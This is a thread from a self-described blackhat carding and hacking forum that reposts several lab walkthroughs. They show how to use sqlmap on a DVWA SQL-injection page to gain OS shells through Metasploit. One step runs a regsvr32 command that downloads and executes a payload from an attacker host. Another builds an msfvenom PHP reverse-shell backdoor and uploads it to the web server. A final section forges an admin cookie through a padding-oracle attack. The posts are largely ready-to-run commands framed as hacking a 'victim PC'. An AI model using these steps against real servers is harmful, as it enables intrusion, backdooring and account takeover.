Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] How to Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn) - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn) (/Thread-Guide-How-to-Exploiting-the-Webserver-using-Sqlmap-and-Metasploit-OS-Pwn)

[Guide] How to Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn) - NINZA - 04-25-2020

This article is about how to use sqlmap for SQL injection to hack victim pc and gain shell access. Here I had performed SQL attack to gain three different types of the shell (meterpreter; command shell; VNC )
Requirement:
  • Xampp/Wamp Server
  • DVWA Lab
  • Kali Linux: Burp suite, sqlmap tool
Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from

[To see content please register here]


Now open the DVWA in your pc and login with following credentials:
Username – admin
Password – password
Click on DVWA Security and set Website Security Level low
From the list of vulnerabilities select SQL Injection for your attack. Type user ID: 1 in text box. Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.
[Image: 1.png?w=687&ssl=1]
Turn on burp suite click on the proxy in the menu bar and go for intercept is on the button. Come back and click on submit button in dvwa. Burp suit will provide” cookie” and “referrer” under fetched data which will be used later in sqlmap commands.
[Image: 2.png?w=687&ssl=1]
Let’s enumerate all databases name using “referrer and cookies” under sqlmap command.
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" --dbs
1
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" --dbs
[Image: 3.png?w=687&ssl=1]
It has dumped all names of the database. Now I am going to choose dvwa to access its back-end database management system.
[Image: 4.png?w=687&ssl=1]
Now type the following command to access shell of the web server and follow the screenshot.
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn
1
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn
[Image: 5.png?w=687&ssl=1]
Type 1 for Metasploit framework to establish a reverse connection then type 4 for php payload for supporting server and again type 1 for the common location for the writable directory to upload payload as a backdoor in victim PC.
[Image: 6.png?w=687&ssl=1]
Here Type 1 for reverse tcp connection as the default option. Now I will choose these entire three payloads one by one and try to hack web server every time. Now type 1 for meterpreter.
[Image: 7.png?w=687&ssl=1]
It will load the Metasploit framework and provides meterpreter session 1.
[Image: 8.png?w=687&ssl=1]
Repeat the whole process till reverse tcp connection when further it asks to choose payload, then type 2 for the shell.
[Image: 9.png?w=687&ssl=1]
Again it will load the Metasploit framework and provides command shell session 1.
[Image: 10.png?w=687&ssl=1]
Repeat the whole process till reverse tcp connection when further it asks to choose payload, this time now type 3 for VNC.
[Image: 11.png?w=687&ssl=1]
Again it will load the Metasploit framework and launching viewer.
[Image: 12.png?w=687&ssl=1]
Here you can see from the given screenshot that I had access victim pc through TightVNC and now victims each moment will be kept under my observation. Hence we have hacked victim pc three times with various type shell.
[Image: 13.png?w=687&ssl=1]

In this article, we will see how to perform command injection using sqlmap and try to execute any cmd command through sqlmap if the web server is having SQL vulnerability.
Requirement
  • Xampp/Wamp Server
  • DVWA Lab
  • Kali Linux: Burp suite, sqlmap tool
Very first you need to install DVWA lab in your XAMPP or WAMP server, read the full article from

[To see content please register here]


Now open the DVWA in your pc and log in with following credentials:
Username – admin
Password – password
Click on DVWA Security and set Website Security Level low
From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in the text box. Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.
[Image: 1.png?w=687&ssl=1]
Turn on burp suite click on the proxy in the menu bar and go for intercept is on the button. Come back and click on submit button in dvwa. Burp suit will provide” cookie” and “referrer” under fetched data which will later use in sqlmap commands.
[Image: 2.png?w=687&ssl=1]
Let’s enumerate all databases name using “referer and cookies” under sqlmap command.
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2" --dbs
1
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2" --dbs
[Image: 3.png?w=687&ssl=1]
Notice the image given below it has dumped all names of the database. Now we are going to choose dvwa for a command injection attack.
[Image: 4.png?w=687&ssl=1]
Now open another terminal for Metasploit framework and Type msfconsole.
This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts a .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH).
Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvport 5555
msf exploit(regsvr32_applocker_bypass_server) > exploit
1
2
3
4
5
6
msf > use exploit/windows/misc/regsvr32_applocker_bypass_server
msf exploit(regsvr32_applocker_bypass_server) > set payload windows/meterpreter/reverse_tcp
msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvhost 192.168.0.104
msf exploit(regsvr32_applocker_bypass_server) > set srvport 5555
msf exploit(regsvr32_applocker_bypass_server) > exploit
Above module will generate a malicious code as a DLL file. Copy the selected part for dll file and then run this malicious code using the sqlmap command
[Image: 6.png?w=687&ssl=1]
Now we’re going to execute dll file through CMD command using sqlmap, therefore, paste above malicious code in sqlmap command as shown in the image given below.
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" –-cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2″ -D dvwa --os-cmd="regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll"
1
sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli/?id=1&submit=submit" –-cookie="security=low; security_level=0; PHPSESSID=9v3dfoh1j1n6pc1ea0ovm84ik2″ -D dvwa --os-cmd="regsvr32 /s /n /u /i:http://192.168.0.104:5555/AVM0rtWSE.sct scrobj.dll"
[Image: 7.png?w=687&ssl=1]
Then type 4 for php payload and type 1 for a common location to upload payload as a backdoor in victim PC.
[Image: 8.png?w=687&ssl=1]
As soon as the command will execute come back to the Metasploit framework and you will get meterpreter session 1 opened.
sessions -i 1
meterpreter>sysinfo
1
2
sessions -i 1
meterpreter>sysinfo
[Image: 9.png?w=687&ssl=1]

Hey Guys!! You may have used sqlmap multiple times for SQL injection to get database information of the web server. Here in this tutorial, I will show you “how to upload any backdoor to get meterpreter session” if the website is suffering from SQL vulnerability.
Table of Content
  • DVWA Lab Set-Up
  • Navigate to page Vulnerable to SQL injection
  • Intercept the Browser Request (Burp-suite)
  • Save Intercept data in a text file
  • Extracting database name (SQLMAP)
  • Spawning os-shell (SQLMAP)
  • Explore file Stager in the browser
  • Generating PHP backdoor (msfvenom)
  • Run Multi-handler (Metasploit)
  • Upload Msfvenom PHP Backdoor and execute
  • Obtain Meterpreter Shell
DVWA Lab Set-Up
  • Requirement:
  • Xampp/Wamp Server
  • DVWA web vulnerable application
  • Kali Linux: Burp suite, sqlmap tool
Very first you need to install DVWA lab in your XAMPP or WAMP server, read the full article from here
Navigate to Page Vulnerable to SQL Injection
Now let’s navigate to DVWA through a web browser and log in with following credentials:
Username – admin
Password – password
Click on DVWA Security and set Website Security Level low
From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in the text box. Don’t click on submit button without setting web browser proxy. Set your browser proxy to make burp suite work properly.
[Image: 1.png?w=687&ssl=1]

Intercept the Browser Request
Now let’s intercept the browser request with the following steps:
  • After setting Network Proxy in the web browser then turn on burp suite.
  • Click on the proxy in the menu bar then go for intercept is on the button.
  • Come back and click on submit button in dvwa.
  • Copy the intercepted data and save in a text file.
The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers. Burp suit will provide” cookie” and “referrer” under fetched data which can be used in sqlmap commands directly.
[Image: 2.png?w=687&ssl=1]
Extracting Database Name
Now use sqlmap for SQL injection and run the following command to enumerate database name.
sqlmap -r file --dbs --batch
1
sqlmap -r file --dbs --batch
Here –r option uses to analyze HTTP request from “file” and as you can observe it has to dump DVWA as the database name.
[Image: 3.png?w=687&ssl=1]
Spawning os-shell
Now Type the following command to run sqlmap to access os-shell of the web server (dvwa)
sqlmap -r file -D dvwa --os-shell
1
sqlmap -r file -D dvwa --os-shell
It will try to generate a backdoor; if you want to upload PHP backdoor inside the web server then type 4 for PHP payload.
[Image: 4.png?w=687&ssl=1]
Type 4 for brute force search to use as a writable directory to upload it.
It is trying to upload the file on “/xampp/htdocs/” by using SQL injection techniques. As soon as the file is uploaded; it will send INFO “the file stager has been successfully uploaded on /xampp/htdocs/”and you will get os-shell of victim pc. Other than here it also shows the path of file stager where you can manually upload your backdoor, look at over highlighted URL:

[To see content please register here]


1

[To see content please register here]


[Image: 5.png?w=687&ssl=1]
Explore File Stager in the Browser
Explore the URL:http://192.168.1.105/tmpurufu.php in the browser. From the given below screenshot, you can read the heading of the web page “sqlmap file uploader” which will let you browse your backdoor on the web server(dvwa) and later we can upload that backdoor at /xampp/htdocs/ directory of the web server.
[Image: 6.png?w=687&ssl=1]
Generating PHP Backdoor
Let’s prepare the malicious php file with msfvenom that we can upload:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.109 lport=4444 -f raw
Copy the code from <?php to die() and save it in a file with .php extension. I have saved the backdoor as shell.php on the desktop and will later browser this file to upload on the web server. On other hand load the Metasploit framework by typing msfconsole and start multi/handle.
[Image: 7.png?w=687&ssl=1]
Upload & Execute Msfvenom PHP Backdoor
Click on browse tab to select your backdoor file (shell.php) file and then click on upload.
[Image: 8.png?w=687&ssl=1]
GREAT!!! Here it shows Admin File is uploaded which means backdoor shell.php is uploaded.
[Image: 9.png?w=687&ssl=1]
To execute the backdoor file on the target machine, run URL:192.168.1.105/shell.php in the browser and you will receive reverse connection through multi/handler.
[Image: 10.png?w=687&ssl=1]
Obtain Meterpreter Shell
msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.1.109
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
1
2
3
4
5
msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.1.109
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
Divine!!! Here we have got our meterpreter session 1.
[Image: 11.png?w=687&ssl=1]

The main purpose to solve this lab was to share the padding oracle attack technique with our visitors
The padding oracle attack enables an attacker to decrypt encrypted data without knowledge of the encryption key and used cipher by sending skillfully manipulated ciphertexts to the padding oracle and observing of the results returned by it. This causes loss of confidentiality of the encrypted data. E.g. in the case of session data stored on the client side the attacker can gain information about the internal state and structure of the application. A padding oracle attack also enables an attacker to encrypt arbitrary plain texts without knowledge of the user key and cipher. If the application assumes that integrity and authenticity of the decrypted data are given, an attacker could be able to manipulate internal session state and possibly gain higher privileges.

[To see content please register here]


First, you need to download padding oracle from

[To see content please register here]

. Now install the iso image in VM ware and start it.
Start Kali Linux as well as explore target IP: 192.168.1.29 on the browser. Now at this point, you need to create a user account, click on the register option.
[Image: 1.png?w=687&ssl=1]
Now register a username with its password and then log in to exploit this vulnerability. I registered as raj: 123
[Image: 2.png?w=687&ssl=1]
Once you create a user account get on login panel and at the same time use burp suite to capture the cookies.
[Image: 3.png?w=687&ssl=1]
Turn up burp suite and don’t forget to set manual proxy of your browser. Now open proxy tab and hit intercepts on the button to capture the request of the target. When this is done you will get fetched data under intercept window. Here you will find that I try to login with credential raj: 123
[Image: 4.png?w=687&ssl=1]
Now right click on its window and a list of options will appear. A further click on send to the repeater. Come across over screenshot here you will find two panels left and right for request and response respectively.
In left panel send username: raj and password: 123 as request; click on GO button to forward this request and which will further generate a cookie for auth as a response in the right panel.
Copy the highlighted cookie and this will be used in below command.
[Image: 5.png?w=687&ssl=1]
Next open terminal to run the command shown in the given image which contains target URL and above-copied cookie
Python-padding oracle is a Python implementation heavily based on PadBuster, an automated script for performing Padding Oracle attacks, developed by Brian Holyfield of Gotham Digital Science. This command will decrypt the encrypted value of auth into plaintext.
Further type 2 where it asked ID recommended.
[Image: 6.png?w=687&ssl=1]
Last part of screenshot has captured three decrypt values in base64, HEX, and ASCII. The cookie of auth is a combination of username with its password from padbuster we come to know what is the encrypted value of username for raj.
[Image: 7.png?w=687&ssl=1]
We are very near to our goal just encrypt this auth cookie with the user as admin once again. Here we have our plaintext as admin and let’s encode it using padbuster.
Further type 2 where it asked ID recommended.
[Image: 8.png?w=687&ssl=1]
Here the highlighted part is our encrypted value for admin. Copy It”BAit——–AAAA”.
[Image: 9.png?w=687&ssl=1]
Go to burp suit once again and click on params under intercept frame; it contains two fields as username and password, now add the third field for auth value. Click on ADD button on the right side of the frame which will add another row in params.
[Image: 10.png?w=687&ssl=1]
Here it has three columns: type, name, and value; paste the above-encrypted value in these columns as type: cookie, name: auth, value: BAit——AAAAAA which we have got from padbuster. Then Click on forward to send this request on the web server.
[Image: 11.png?w=687&ssl=1]
Again click on forward to send it.
[Image: 12.png?w=687&ssl=1]
A request sent by burp suite automatically on the web server you will get logged in as an admin account.
Congrats!!! We meet the goal of this lab.
[Image: 13.png?w=687&ssl=1]